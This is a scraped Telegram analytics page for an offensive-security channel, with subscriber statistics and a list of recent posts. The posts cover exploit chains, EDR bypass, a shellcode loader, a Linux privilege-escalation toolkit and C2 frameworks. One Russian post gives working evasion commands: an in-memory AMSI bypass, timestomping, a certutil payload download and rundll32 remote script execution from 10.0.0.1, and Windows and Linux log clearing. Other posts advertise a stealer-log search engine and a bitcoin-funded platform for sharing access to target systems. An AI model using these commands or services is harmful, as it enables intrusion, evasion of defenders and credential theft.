reconcore
Открыть в Telegram
#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.
Больше2 289
Подписчики
+124 часа
-17 дней
+13030 день
Загрузка данных...
Похожие каналы
Облако тегов
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
июль '26
июль '26
+79
в 0 каналах
июнь '26
+159
в 1 каналах
Get PRO
май '26
+92
в 2 каналах
Get PRO
апрель '26
+89
в 2 каналах
Get PRO
март '26
+116
в 1 каналах
Get PRO
февраль '26
+145
в 1 каналах
Get PRO
январь '26
+157
в 2 каналах
Get PRO
декабрь '25
+317
в 3 каналах
Get PRO
ноябрь '25
+170
в 0 каналах
Get PRO
октябрь '25
+216
в 1 каналах
Get PRO
сентябрь '25
+125
в 2 каналах
Get PRO
август '25
+118
в 5 каналах
Get PRO
июль '25
+96
в 2 каналах
Get PRO
июнь '25
+51
в 1 каналах
Get PRO
май '25
+68
в 3 каналах
Get PRO
апрель '25
+117
в 2 каналах
Get PRO
март '25
+84
в 1 каналах
Get PRO
февраль '25
+108
в 1 каналах
Get PRO
январь '25
+73
в 2 каналах
Get PRO
декабрь '24
+4
в 0 каналах
Get PRO
ноябрь '24
+127
в 0 каналах
Get PRO
октябрь '24
+38
в 0 каналах
Get PRO
сентябрь '24
+37
в 0 каналах
Get PRO
август '24
+328
в 0 каналах
Get PRO
июль '240
в 0 каналах
Get PRO
июнь '24
+15
в 1 каналах
| Дата | Привлечение подписчиков | Упоминания | Каналы | |
| 14 июля | +1 | |||
| 13 июля | +3 | |||
| 12 июля | 0 | |||
| 11 июля | +3 | |||
| 10 июля | +2 | |||
| 09 июля | +5 | |||
| 08 июля | +2 | |||
| 07 июля | +9 | |||
| 06 июля | +2 | |||
| 05 июля | +3 | |||
| 04 июля | +4 | |||
| 03 июля | +9 | |||
| 02 июля | +12 | |||
| 01 июля | +24 |
Посты канала
Forgotten UEFI Shims Undermining Secure Boot
Original text: “Forgotten UEFI shims undermining Secure Boot” — Martin Smolár, ESET Research (July 14, 2026). Figures, code blocks, and technical diagrams below are reproduced verbatim with attribution captions.Executive Summary
ESET researchers identified 11 old and forgotten UEFI shim bootloaders at versions 0.9 and below that can be used to bypass UEFI Secure Boot…#secureboot #uefi @reconcore
| 2 | Two Bytes to RCE: Chaining Rift + PoolSlip into an ASLR-Independent nginx 1.30.0 Exploit
Original text: “Two Bytes to RCE: Chaining Rift + PoolSlip” — y198, Verichains (Jun 06, 2026). Code, tables and figures below are reproduced verbatim with attribution captions. PoC: github.com/y198nt/Nginx-chain-Rift-Poolslip.
Executive Summary
A two-bug chain in nginx 1.30.0 achieves unauthenticated remote code execution without relying on ASLR breaks. The first bug, CVE-2026-42945 (“Rift”), is a forward…
#cve #buffer_overflow #exploit #development #exploitation #network #vulnerability #analysis #rce #nginx @reconcore | 230 |
| 3 | Certified Evasion Techniques Professional (CETP). (2025)
Курс предназначен для специалистов по информационной безопасности с опытом, даст необходимым знания для обхода защиты в современных корпоративных средах. Этот курс углубляется в методы и методологии, используемые для обхода контрмер конечных точек, таких как EDR. Вы получите полное понимание внутренних устройств Windows, включая различие между компонентами пользовательского режима и режима ядра, а также получите полное представление о внутренних элементах EDR и о том, как собираются телеметрии, узнаете о Windows Internals, обращая вспять EDR, минуя Microsoft Defender для Endpoint (MDE), Elastic EDR, используя ядра Sysmon для уклонения от защиты и обходя контроль безопасности, такие как защищенные процессы (PP), Process Protection Light (PPL), Digital Signature Enforcement (DSE), правила снижения поверхности атаки (ASR) и недееспособные.
Этот курс не просто об изучении новых методов; это понимание внутренней работы оборонных технологий, чтобы вы могли перехитрить их в любом сценарии.
#edr #technique @reconcore | 332 |
| 4 | A tale of EDR bypass methods
#bypass #edr #methods @reconcore | 327 |
| 5 | Pocket Disasm
One MCP endpoint. Many isolated IDALib sessions.
A lightweight, agent-first control layer for headless binary analysis with the IDA Pro MCP toolset.
@reconcore | 352 |
| 6 | https://t.me/boost/reconcore | 212 |
| 7 | P³ — Shellcode Loader: Process Parameter Poisoning
This loader implements a code injection technique that leverages the Windows Process Parameters structure (PEB) as a staging and execution location for remote shellcode injection.
By passing payload data implicitly through standard parameters like CommandLine, Environment, or ShellInfo, it bypasses EDR detection because it doesn't touch heavily monitored APIs like VirtualAllocEx, WriteProcessMemory, or CreateRemoteThread. Since it runs without spawning suspended processes or relying on process hollowing, it leaves virtually no obvious footprint in the system.
Research
#maldev #injection #edr #bypass #windows #peb @reconcore | 445 |
| 8 | 💉 P³ — Shellcode Loader: Process Parameter Poisoning
This loader implements a code injection technique that leverages the Windows Process Parameters structure (PEB) as a staging and execution location for remote shellcode injection.
By passing payload data implicitly through standard parameters like CommandLine, Environment, or ShellInfo, it bypasses EDR detection because it doesn't touch heavily monitored APIs like VirtualAllocEx, WriteProcessMemory, or CreateRemoteThread. Since it runs without spawning suspended processes or relying on process hollowing, it leaves virtually no obvious footprint in the system.
🔗 Research:
https://sensepost.com/blog/2026/process-parameter-poisoning/
🔗 Source:
https://github.com/Orange-Cyberdefense/p3-loader/
#maldev #injection #edr #bypass #windows #peb | 1 |
| 9 | Defense Evasion: как атакующий прячется от EDR и антивируса
👋 Приветствую в мире цифровой безопасности!
Сегодня расскажу про техники Defense Evasion - как атакующий скрывает свою активность от средств защиты уже после того как закрепился в системе.
⏺Defense Evasion - это не одна техника, а целый класс. Тут задача не выполнить действие тихо один раз, а сделать так чтобы весь дальнейший процесс не триггерил алерты. Без этого закрепление в системе бесполезно: EDR увидит подозрительный процесс через час и всё оборвёт.
⏺AMSI bypass - Windows Antimalware Scan Interface проверяет PowerShell-код перед выполнением. Атакующий патчит функцию проверки прямо в памяти:
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b = $a.GetField('amsiInitFailed','NonPublic,Static')
$b.SetValue($null,$true)
После этого любой вредоносный скрипт проходит без сканирования - AMSI думает, что инициализация провалилась и просто пропускает всё дальше.
⏺Process injection - вместо запуска нового подозрительного процесса код внедряется в уже доверенный:
$proc = Get-Process -Name "explorer"
# Дальше через WriteProcessMemory и CreateRemoteThread
# внедряем shellcode в легитимный процесс
Для мониторинга - это выглядит, как обычный explorer.exe, а не как новый неизвестный бинарь - большинство базовых правил детекта смотрят именно на имя и происхождение процесса.
⏺Timestomping - меняем метки времени файла, чтобы он не выделялся среди системных:
# Linux
touch -r /bin/ls malicious_file
stat malicious_file
# Windows через PowerShell
(Get-Item file.exe).CreationTime = "01/15/2020 10:00:00"
Форензика часто ищет файлы созданные в момент инцидента - timestomping ломает эту эвристику полностью.
⏺Living off the land - используем только легитимные системные утилиты вместо своих инструментов, тогда сигнатурный детект бессилен:
# Скачивание файла через certutil вместо curl
certutil -urlcache -split -f http://10.0.0.1/payload.exe payload.exe
# Выполнение через rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.0.0.1/script.sct")
certutil и rundll32 подписаны Microsoft и есть на каждой Windows-машине - антивирус не может просто заблокировать их целиком.
⏺Log clearing - чистим или отключаем логирование там где были:
wevtutil cl Security
wevtutil cl System
# Linux
> /var/log/auth.log
history -c
⏺Детектируется через поведенческий анализ а не сигнатуры: аномальная работа с памятью легитимных процессов, вызов certutil с параметром urlcache, массовая очистка логов сразу после подозрительной активности, несоответствие timestamp файла и записей в MFT. Sysmon Event ID 1 (создание процесса) и 10 (доступ к памяти процесса) - основа для детекта большинства этих техник.
ZeroDay | Серверная Админа | #defenseevasion | 450 |
| 10 | Linux LPE Toolkit
Multi-architecture privilege escalation toolkit with 24 exploits (amd64 pre-built; other architectures compiled via gcc at runtime). Supports amd64, arm64, 386, mips, mipsle, mips64, and mips64le. Detects kernel version, filters patched exploits, and tries each in order until root is obtained. | 542 |
| 11 | kmz.bio: The stealer logs search engine.
Direct search engine for stealer logs, combolists, and priv8 clouds. @kmzGod_bot
https://kmz.bio | 639 |
| 12 | Protecting C2 Traffic in Nim
#c2 #dev @reconcore | 757 |
| 13 | Currently in development, this framework is a decentralized operator communication platform utilizing a mixnet that surpasses the Tor network protocol. The platform features custom operator beacons that connect to your remote server as compiled modules. It allows operators to create their own custom beacon files in any supported programming language, exchange them on forums or marketplaces, and share access to target systems.
To secure early adopter status and support development, you can use this address: (bitcoin:bc1q0xqjrkwaqp4d57kn7f5c4urzdd29aeruaf7pg9?message=access-cyberspace) or contact us to request a personal one. | 1 |
| 14 | Нет текста... | 2 |
| 15 | CVE-2026-10520
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
#cve #vulnerability #rce #ivanti @reconcore | 896 |
| 16 | Cortex C2
Open source Linux post exploitation framework inspired by the void link C2 framework, and my implementation was built for embedded device security research, CTF use and for educational purposes only.
#c2 @reconcore | 913 |
| 17 | Disposable Tooling: Generating Mythic C2 Agents End-to-End With LLMs
Original text: “Disposable Tooling: Building LLM-Generated Mythic Agents from Prompt to Deployment” — Adam Chester, SpecterOps (Jun 24, 2026). Figures are reproduced with attribution captions and the agent summary table is reproduced verbatim; the prose below is an independent summary.
#llm #cybersecurity #research #redteam @reconcore | 853 |
| 18 | image_2026-07-03_03-56-49.png | 1 |
| 19 | Currently in development, this framework is a decentralized operator communication platform utilizing a mixnet that surpasses the Tor network protocol. The platform features custom operator beacons that connect to your remote server as compiled modules. It allows operators to create their own custom beacon files in any supported programming language, exchange them on forums or marketplaces, and share access to target systems.
To secure early adopter status and support development, you can use this address: (bitcoin:bc1q0xqjrkwaqp4d57kn7f5c4urzdd29aeruaf7pg9?message=access-cyberspace) or contact us to request a personal one. | 716 |
| 20 | Please redirect your boost to https://t.me/boost/reconcore — group requirements are reduced by 1 vote, with no restrictions on voters.
Пожалуйста, перенаправьте буст на https://t.me/boost/reconcore — лимит группы снижен на 1 голос, без ограничений для голосовавших. | 66 |
